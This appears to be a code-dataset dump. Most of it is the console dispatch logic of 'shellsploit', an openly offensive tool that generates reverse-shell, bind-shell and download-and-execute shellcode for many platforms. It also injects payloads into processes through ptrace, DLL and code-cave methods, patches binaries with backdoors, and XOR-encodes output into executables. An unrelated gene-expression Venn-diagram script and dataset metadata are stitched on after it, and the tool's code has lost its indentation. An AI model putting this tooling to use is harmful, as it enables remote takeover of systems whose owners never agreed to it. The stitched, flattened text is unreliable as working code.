                                print(bcolors.RED + bcolors.BOLD + "\nFile can't be found, please try with the full path.\n" + bcolors.ENDC)
self.control(string)
else:
self.argvlist[1] = terminal[14:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:14] == "show shellcode":
if string in B3mB4m.bfdlist():
                    print("This option is not available for this module.")
self.control(string)
elif string == "injectors/Windowsx86/tLsInjectorDLL":
self.control(string)
else:
if self.argvlist[1] != "None":
B3mB4m.prettyout(self.argvlist[1])
else:
                        print("\nYou must set shellcode before this.\n")
self.control(string)
elif terminal[:12] == "show options":
from .core.Injectoroptions import controlset
if string in B3mB4m.bfdlist():
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
self.control(string)
else:
if string != "injectors/Windows/x86/tLsInjectorDLL":
if self.argvlist[1] != "None":
self.mycache = "process"
controlset(string, self.argvlist[0], self.mycache)
self.control(string)
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
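            # "inject" dispatches to the backend matching the selected
            # module path: argvlist[0] holds the pid/file target,
            # argvlist[1] the shellcode/DLL (plus a port for BFD patching).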
elif terminal[:6] == "inject":
                if self.argvlist[0] == "None" or self.argvlist[1] == "None":
                    print("\nYou must set pid/shellcode before injecting!\n")
self.control(string)
if string == "injectors/Linux86/ptrace":
from .inject.menager import linux86ptrace
linux86ptrace(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Linux64/ptrace":
from .inject.menager import linux64ptrace
linux64ptrace(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/byteman":
from .inject.menager import windows
windows(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/x86/tLsInjectorDLL":
from .inject.menager import winx86tLsDLL
winx86tLsDLL(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/x86/CodecaveInjector":
from .inject.menager import winx86Codecave
winx86Codecave(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/Dllinjector":
from .inject.menager import winDLL
winDLL(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/BFD/Patching":
from .inject.menager import winBFD
winBFD(self.argvlist[0], self.argvlist[1], int(self.argvlist[2]))
# elif string == "injectors/MacOSX/BFD/Patching":
# from .inject.menager import MacBFD
# MacBFD( FILE, HOST, PORT)
# elif string == "injectors/Linux/BFD/Patching":
# from .inject.menager import LinuxBFD
# LinuxBFD( FILE, HOST, PORT)
# elif string == "injectors/Linux/ARM/x86/BFD/Patching":
# from .inject.menager import LinuxARMx86BFD
# LinuxARMx86BFD( FILE, HOST, PORT)
# elif string == "FreeBSD/x86/BFD/Patching":
# from .inject.menager import FreeBSDx86
# FreeBSDx86( FILE, HOST, PORT)
self.control(string)
# elif terminal[:7] == "extract":
# Future option
# Make it executable (Dynamic virus land)
# from bla bla import executable
# generator()
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
# Backdoors
elif string[:9] == "backdoors":
tab.completion("backdoors")
if terminal[:4] == "help":
from .core.help import backdoorshelp
backdoorshelp()
self.control(string)
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:12] == "show options":
from .core.SHELLoptions import controlset
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:5] == "unset":
if terminal[6:] == "lhost":
self.argvlist[0] = "None"
elif terminal[6:] == "lport":
self.argvlist[1] = "None"
# elif terminal[6:] == "encoder":
# self.argvlist[2] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:3] == "set":
if terminal[4:9].lower() == "lhost":
self.argvlist[0] = terminal[10:]
elif terminal[4:9].lower() == "lport":
self.argvlist[1] = terminal[10:]
# elif terminal[4:11].lower() == "encoder"
# self.argvlist[2] = terminal[11:]
else:
print(bcolors.RED + bcolors.BOLD + "This option is not available." + bcolors.ENDC)
self.control(string)
elif terminal[:8] == "generate":
from .Session.generator import process
                # Custom output path will be added ..
if self.argvlist[0] == "None" or self.argvlist[1] == "None":
                    print("\nSet options before generating the payload.\n")
self.control(string)
else:
process(data=string, HOST=self.argvlist[0], PORT=self.argvlist[1], ENCODER=False, logger=True)
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
# Shellcodes
else:
tab.completion("shellcodes")
if terminal[:4] == "help":
# if terminal[5:11] == "output":
# from Outputs.exehelp import help
# print help()
# self.control( string)
from .core.help import shellcodehelp
shellcodehelp()
self.control(string)
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
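            # "whatisthis" classifies the selected payload by keywords in
            # its module path and prints the matching description.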
elif terminal[:10] == "whatisthis":
from .core.whatisthis import whatisthis
if "egg" in string:
message = "Egg-hunt"
elif "tcp" in string or "reverse" in string or "netcat" in string:
message = "Remote"
elif "download" in string:
message = "Download and execute"
else:
message = "Local"
                # Add special handling for particular modules
whatisthis(message)
self.control(string)
elif terminal[:5] == "unset":
if terminal[6:] == "encoder":
self.argvlist[0] = "None"
elif terminal[6:] == "iteration":
self.argvlist[1] = "None"
elif terminal[6:] == "file":
if string in B3mB4m.readlist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "port":
if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
self.argvlist[2] = "None"
else:
                        B3mB4m.invalidcommand()
elif terminal[6:] == "command":
if string in B3mB4m.execlist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "link":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "filename":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[3] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "host":
if string in B3mB4m.reversetcplist():
self.argvlist[3] = "None"
else:
B3mB4m.invalidcommand()
else:
B3mB4m.invalidcommand()
self.control(string)
elif terminal[:3] == "set":
if terminal[4:8] == "file":
if string in B3mB4m.readlist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "port":
if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "command":
if string in B3mB4m.execlist():
self.argvlist[2] = terminal[12:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "link":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "message":
if string in B3mB4m.messageboxlist():
self.argvlist[2] = terminal[12:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "host":
if string in B3mB4m.reversetcplist():
self.argvlist[3] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:12] == "filename":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[3] = terminal[13:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "encoder":
from .core.lists import encoders
if terminal[12:] not in encoders():
                        print("This encoder is not in the list!")
self.control(string)
self.argvlist[0] = terminal[12:]
elif terminal[4:13] == "iteration":
self.argvlist[1] = terminal[14:]
else:
B3mB4m.invalidcommand()
self.control(string)
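            # "show options" passes argvlist entries to controlset() in a
            # per-module order matching each option template's fixed layout.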
elif terminal[:12] == "show options":
from .core.SHELLoptions import controlset
if string[:7] == "linux86":
if string == "linux86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/chmod":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/download&exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:10] == "solarisx86":
if string == "solarisx86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "solarisx86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "solarisx86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:7] == "linux64":
if string == "linux64/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/mkdir":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "linux":
if string == "linux/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "osx86":
if string == "osx86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "osx86/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "osx64":
if string == "osx64/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "osx64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:11] == "freebsd_x86":
if string == "freebsd_x86/reverse_tcp2":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:11] == "freebsd_x64":
if string == "freebsd_x64/tcp_bind":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "freebsd_x64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x64/exec":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:9] == "linux_arm":
if string == "linux_arm/chmod":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_arm/exec":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_arm/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:10] == "linux_mips":
if string == "linux_mips/chmod":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_mips/reverse_tcp":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "linux_mips/tcp_bind":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:7] == "windows":
if string == "windows/messagebox":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "windows/exec":
controlset(string, self.argvlist[1], self.argvlist[0], self.argvlist[2])
elif string == "windows/download&execute":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "windows/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
elif string == "windows/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
self.control(string)
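            # "generate" validates the options each payload requires, then
            # builds the raw shellcode through the generator database.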
elif terminal[:8] == "generate":
from .database.generator import generator
if string[:7] == "linux86":
if string == "linux86/binsh_spawn":
self.disassembly = generator("linux86", "binsh_spawn")
elif string == "linux86/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "read", FILE=self.argvlist[2])
elif string == "linux86/exec":
if self.argvlist[2] == "None":
print("\nCommand must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "exec", COMMAND=self.argvlist[2])
elif string == "linux86/download&exec":
if self.argvlist[2] == "None":
print("\nLink must be declared.\n")
self.control(string)
elif "/" not in self.argvlist[2]:
                            print("\nWrong URL format; example: 127.0.0.1/X\n")
self.control(string)
elif len(self.argvlist[2].split("/")[-1]) != 1:
                            print("\nYour filename must be exactly one character long.\n")
self.control(string)
                        if "http" in self.argvlist[2] or "https" in self.argvlist[2] or "www." in self.argvlist[2]:
try:
edit = self.argvlist[2].replace("http://", "").replace("https://", "").replace("www.", "")
self.argvlist[2] = edit
except:
pass
self.disassembly = generator("linux86", "download&exec", URL=self.argvlist[2])
elif string == "linux86/chmod":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "chmod", FILE=self.argvlist[2])
elif string == "linux86/tcp_bind":
if self.argvlist[2] == "None":
print("\nPORT must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "tcp_bind", port=self.argvlist[2])
elif string == "linux86/reverse_tcp":
if self.argvlist[2] == "None" or self.argvlist[3] == "None":
print("\nHost&Port must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:7] == "linux64":
if string == "linux64/binsh_spawn":
self.disassembly = generator("linux64", "binsh_spawn")
elif string == "linux64/tcp_bind":
self.disassembly = generator("linux64", "tcp_bind", port=self.argvlist[2])
elif string == "linux64/reverse_tcp":
self.disassembly = generator("linux64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux64/read":
self.disassembly = generator("linux64", "read", FILE=self.argvlist[2])
if string[:5] == "linux":
if string == "linux/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux", "read", FILE=self.argvlist[2])
elif string == "linux/binsh_spawn":
self.disassembly = generator("linux", "binsh_spawn")
elif string == "linux/tcp_bind":
self.disassembly = generator("linux", "tcp_bind", port=self.argvlist[2])
elif string == "linux/reverse_tcp":
self.disassembly = generator("linux", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:5] == "osx86":
if string == "osx86/tcp_bind":
self.disassembly = generator("osx86", "tcp_bind", port=self.argvlist[2])
elif string == "osx86/binsh_spawn":
self.disassembly = generator("osx86", "binsh_spawn")
elif string == "osx86/reverse_tcp":
self.disassembly = generator("osx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:5] == "osx64":
if string == "osx64/binsh_spawn":
self.disassembly = generator("osx64", "binsh_spawn")
elif string == "osx64/tcp_bind":
self.disassembly = generator("osx64", "tcp_bind", port=self.argvlist[2])
elif string == "osx64/reverse_tcp":
self.disassembly = generator("osx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:11] == "freebsd_x86":
if string == "freebsd_x86/binsh_spawn":
self.disassembly = generator("freebsdx86", "binsh_spawn")
elif string == "freebsd_x86/read":
self.disassembly = generator("freebsdx86", "read", FILE=self.argvlist[2])
elif string == "freebsd_x86/reverse_tcp":
self.disassembly = generator("freebsdx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x86/reverse_tcp2":
self.disassembly = generator("freebsdx86", "reverse_tcp2", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x86/exec":
self.disassembly = generator("freebsdx86", "exec", COMMAND=self.argvlist[2])
elif string == "freebsd_x86/tcp_bind":
self.disassembly = generator("freebsdx86", "tcp_bind", port=self.argvlist[2])
elif string[:11] == "freebsd_x64":
if string == "freebsd_x64/binsh_spawn":
self.disassembly = generator("freebsdx64", "binsh_spawn")
elif string == "freebsd_x64/tcp_bind":
self.disassembly = generator("freebsdx64", "tcp_bind", port=self.argvlist[2], PASSWORD=self.argvlist[3])
elif string == "freebsd_x64/reverse_tcp":
self.disassembly = generator("freebsdx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x64/exec":
self.disassembly = generator("freebsdx64", "exec", COMMAND=self.argvlist[2])
elif string[:9] == "linux_arm":
if string == "linux_arm/chmod":
self.disassembly = generator("linux_arm", "chmod", FILE=self.argvlist[2])
elif string == "linux_arm/binsh_spawn":
self.disassembly = generator("linux_arm", "binsh_spawn")
elif string == "linux_arm/reverse_tcp":
self.disassembly = generator("linux_arm", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux_arm/exec":
self.disassembly = generator("linux_arm", "exec", COMMAND=self.argvlist[2])
elif string[:10] == "linux_mips":
if string == "linux_mips/reverse_tcp":
self.disassembly = generator("linux_mips", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux_mips/binsh_spawn":
self.disassembly = generator("linux_mips", "binsh_spawn")
elif string == "linux_mips/chmod":
self.disassembly = generator("linux_mips", "chmod", FILE=self.argvlist[2])
elif string == "linux_mips/tcp_bind":
self.disassembly = generator("linux_mips", "tcp_bind", port=self.argvlist[2])
elif string[:7] == "windows":
if string == "windows/messagebox":
self.disassembly = generator("windows", "messagebox", MESSAGE=self.argvlist[2])
elif string == "windows/download&execute":
self.disassembly = generator("windows", "downloandandexecute", URL=self.argvlist[2], FILENAME=self.argvlist[3])
elif string == "windows/exec":
self.disassembly = generator("windows", "exec", COMMAND=self.argvlist[2])
elif string == "windows/reverse_tcp":
self.disassembly = generator("windows", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "windows/tcp_bind":
self.disassembly = generator("windows", "tcp_bind", port=self.argvlist[2])
elif string[:10] == "solarisx86":
if string == "solarisx86/binsh_spawn":
self.disassembly = generator("solarisx86", "binsh_spawn")
elif string == "solarisx86/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("solarisx86", "read", FILE=self.argvlist[2])
elif string == "solarisx86/reverse_tcp":
self.disassembly = generator("solarisx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "solarisx86/tcp_bind":
self.disassembly = generator("solarisx86", "tcp_bind", port=self.argvlist[2])
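                # Post-process the generated shellcode with the selected
                # encoder (if any), defaulting the iteration count to 1
                # when it is unset or zero.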
if self.argvlist[0] == "x86/xor_b3m":
from .encoders.shellcode.xor_b3m import prestart
if self.argvlist[1] == "None":
self.argvlist[1] = 1
                    elif self.argvlist[1] == "0":
self.argvlist[1] = 1
self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))
elif self.argvlist[0] == "x86/xor":
from .encoders.shellcode.xor import prestart
if self.argvlist[1] == "None":
self.argvlist[1] = 1
                    elif self.argvlist[1] == "0":
self.argvlist[1] = 1
self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))
else:
self.disassembly = self.disassembly
                # print "\n"+"Shellcode Length : %d" % len(str(bytearray(self.disassembly.replace("\\x", "").decode("hex"))))
B3mB4m.prettyout(self.disassembly)
self.control(string)
elif terminal[:6] == "output":
if self.disassembly == "None":
                    print("Please generate shellcode before saving it.")
self.control(string)
                # Not sure whether this option should take its parameters
                # as command arguments or read them interactively.
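                # For exe output, the target OS tag is read from the rest
                # of the command line and mapped to the key ExeFile() expects.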
if terminal[7:10].lower() == "exe":
                    # Missing parts will be added ..
if "linux86" in terminal.lower():
OS = "linux86"
elif "linux64" in terminal.lower():
OS = "linux64"
elif "windows" in terminal.lower():
OS = "windows"
elif "freebsdx86" in terminal.lower():
OS = "freebsdx86"
elif "freebsdx64" in terminal.lower():
OS = "freebsdx64"
elif "openbsdx86" in terminal.lower():
OS = "openbsdx86"
elif "solarisx86" in terminal.lower():
OS = "solarisx86"
elif "linuxpowerpc" in terminal.lower():
OS = "linuxpowerpc"
elif "openbsdpowerpc" in terminal.lower():
OS = "openbsdpowerpc"
elif "linuxsparc" in terminal.lower():
OS = "linuxsparc"
elif "freebsdsparc" in terminal.lower():
OS = "freebsdsparc"
elif "openbsdsparc" in terminal.lower():
OS = "openbsdsparc"
elif "solarissparc" in terminal.lower():
OS = "solarissparc"
elif "linuxarm" in terminal.lower():
OS = "linuxarm"
elif "freebsdarm" in terminal.lower():
OS = "freebsdarm"
elif "openbsdarm" in terminal.lower():
OS = "openbsdarm"
else:
OS = None
from .Outputs.exe import ExeFile
ExeFile(self.disassembly, OS)
self.control(string)
elif terminal[7:10].lower() == "c++" or terminal[7:10].lower() == "cpp":
from .Outputs.Cplusplus import CplusplusFile
if "windows" in string:
CplusplusFile(self.disassembly, True)
else:
CplusplusFile(self.disassembly)
elif terminal[7:8].lower() == "c":
if "windows" in string:
from .Outputs.Cplusplus import CplusplusFile
CplusplusFile(self.disassembly, True)
else:
from .Outputs.C import CFile
CFile(self.disassembly)
elif terminal[7:9].lower() == "py" or terminal[7:13].lower() == "python":
from .Outputs.python import PyFile
PyFile(self.disassembly)
elif terminal[7:10].lower() == "txt":
from .Outputs.txt import TxtFile
TxtFile(self.disassembly)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown output type: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:2].lower() == "ip":
B3mB4m.IP()
self.control(string)
elif terminal[:13] == "show encoders":
from .core.lists import encoderlist
encoderlist()
self.control(string)
elif terminal[:5] == "disas":
                B3mB4m().startdisas(self.disassembly, string)
self.control(string)
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
| 50.883641
| 140
| 0.466683
|
| true
| true
|
790db22589642ac8d0bb393e746a8f9ce6546756
| 2,603
|
py
|
Python
|
gscripts/general/venn_matrix.py
|
YeoLab/gscripts
|
ae653d29d0ce82d342f7f6ff5bbeedd27a2e062b
|
[
"MIT"
] | 12
|
2015-07-10T09:36:49.000Z
|
2021-07-06T03:25:04.000Z
|
gscripts/general/venn_matrix.py
|
YeoLab/gscripts
|
ae653d29d0ce82d342f7f6ff5bbeedd27a2e062b
|
[
"MIT"
] | 43
|
2015-01-21T20:01:38.000Z
|
2021-04-13T17:50:38.000Z
|
gscripts/general/venn_matrix.py
|
YeoLab/gscripts
|
ae653d29d0ce82d342f7f6ff5bbeedd27a2e062b
|
[
"MIT"
] | 19
|
2015-05-02T09:33:17.000Z
|
2022-02-12T17:08:06.000Z
|
from matplotlib import pyplot as plt
from matplotlib_venn import venn2
import glob
import compare_two_zlists as cv
import math
from scipy.stats import hypergeom
from decimal import Decimal
from math import log
def make_venn_matrix(filename_list):
fig1 = plt.figure(1)
fig1.suptitle('Differentially Expressed Genes Overlap', fontsize=24)
subplot_counter = 1
    print(len(filename_list) * len(filename_list))
for zlist1 in filename_list:
for zlist2 in filename_list:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
offset = math.ceil(float(subplot_counter)/float(len(filename_list)))
position = int(subplot_counter - 1) % len(filename_list) + 1
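            # offset is the 1-based row and position the 1-based column of
            # this cell in the len(filename_list) x len(filename_list) grid;
            # cells above the diagonal compare the up_A sets, cells below
            # the up_B sets.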
if zlist1 == zlist2:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
up_A, up_B, all_changing = cv.get_changing(zlist1)
plt.text(0, 0, '{}'.format(zlist1))
plt.text(0, .4, 'Higher in A: {}'.format(str(len(up_A))))
plt.text(0, .2, 'Higher in B: {}'.format(str(len(up_B))))
plt.axis('off')
plt.plot()
                print('working {}'.format(subplot_counter))
                subplot_counter += 1
else:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
(venn_values, all_union) = cv.compare_two(zlist1, zlist2)
color1 = ''
color2 = ''
if position > offset:
color1 = 'MediumVioletRed'
color2 = 'OrangeRed'
union = venn_values['up_A']['union']
in_common = venn_values['up_A']['common']
unique_1 = venn_values['up_A']['up_1']
unique_2 = venn_values['up_A']['up_2']
if position < offset:
color1 = 'LimeGreen'
color2 = 'DodgerBlue'
union = venn_values['up_B']['union']
in_common = venn_values['up_B']['common']
unique_1 = venn_values['up_B']['up_1']
unique_2 = venn_values['up_B']['up_2']
total_genes = len(all_union)
total_1 = unique_1 + in_common
total_2 = unique_2 + in_common
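                # Upper-tail hypergeometric probability of an overlap this
                # large when total_2 genes are drawn from total_genes of
                # which total_1 are hits; log() raises ValueError when the
                # survival probability underflows to zero.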
try:
log_prob = Decimal(log(hypergeom.sf(in_common, total_genes, total_1, total_2)))
                except ValueError:
log_prob = '-inf'
plt.plot(cv.draw_venn(union, in_common, unique_1, unique_2, color1, color2))
if log_prob != '-inf':
plt.annotate('log p-value: %2.3f'%log_prob, xy=(0,0), xycoords='axes fraction')
else:
plt.annotate('log p-value: -inf', xy=(0,0), xycoords='axes fraction')
                print('working {}'.format(subplot_counter))
                print(str(total_genes))
                print(str(log_prob))
                subplot_counter += 1
plt.show()
return
if __name__ == '__main__':
venn_filelist = glob.glob('*zlist')
venn_filelist.sort()
make_venn_matrix(venn_filelist)
| 26.835052
| 84
| 0.676143
|
from matplotlib import pyplot as plt
from matplotlib_venn import venn2
import glob
import compare_two_zlists as cv
import math
from scipy.stats import hypergeom
from decimal import Decimal
from math import log
def make_venn_matrix(filename_list):
fig1 = plt.figure(1)
fig1.suptitle('Differentially Expressed Genes Overlap', fontsize=24)
subplot_counter = 1
print len(filename_list)*len(filename_list)
for zlist1 in filename_list:
for zlist2 in filename_list:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
offset = math.ceil(float(subplot_counter)/float(len(filename_list)))
position = int(subplot_counter - 1) % len(filename_list) + 1
if zlist1 == zlist2:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
up_A, up_B, all_changing = cv.get_changing(zlist1)
plt.text(0, 0, '{}'.format(zlist1))
plt.text(0, .4, 'Higher in A: {}'.format(str(len(up_A))))
plt.text(0, .2, 'Higher in B: {}'.format(str(len(up_B))))
plt.axis('off')
plt.plot()
print 'working {}'.format(subplot_counter)
subplot_counter+=1
else:
plt.subplot(len(filename_list), len(filename_list), subplot_counter)
(venn_values, all_union) = cv.compare_two(zlist1, zlist2)
color1 = ''
color2 = ''
if position > offset:
color1 = 'MediumVioletRed'
color2 = 'OrangeRed'
union = venn_values['up_A']['union']
in_common = venn_values['up_A']['common']
unique_1 = venn_values['up_A']['up_1']
unique_2 = venn_values['up_A']['up_2']
if position < offset:
color1 = 'LimeGreen'
color2 = 'DodgerBlue'
union = venn_values['up_B']['union']
in_common = venn_values['up_B']['common']
unique_1 = venn_values['up_B']['up_1']
unique_2 = venn_values['up_B']['up_2']
total_genes = len(all_union)
total_1 = unique_1 + in_common
total_2 = unique_2 + in_common
try:
log_prob = Decimal(log(hypergeom.sf(in_common, total_genes, total_1, total_2)))
except ValueError:
log_prob = '-inf'
plt.plot(cv.draw_venn(union, in_common, unique_1, unique_2, color1, color2))
if log_prob != '-inf':
plt.annotate('log p-value: %2.3f'%log_prob, xy=(0,0), xycoords='axes fraction')
else:
plt.annotate('log p-value: -inf', xy=(0,0), xycoords='axes fraction')
print('working {}'.format(subplot_counter))
print(total_genes)
print(log_prob)
subplot_counter += 1
plt.show()
return
if __name__ == '__main__':
venn_filelist = glob.glob('*zlist')
venn_filelist.sort()
make_venn_matrix(venn_filelist)
| false
| true
|
790db4e57c8d5c2412f1dad6e329136609500df2
| 286
|
py
|
Python
|
products/urls.py
|
Nenu1985/blog
|
df94ae3243314d43e16c33d0150a980ce34535a3
|
[
"MIT"
] | null | null | null |
products/urls.py
|
Nenu1985/blog
|
df94ae3243314d43e16c33d0150a980ce34535a3
|
[
"MIT"
] | 13
|
2019-12-04T23:32:05.000Z
|
2022-02-10T12:07:30.000Z
|
products/urls.py
|
Nenu1985/blog
|
df94ae3243314d43e16c33d0150a980ce34535a3
|
[
"MIT"
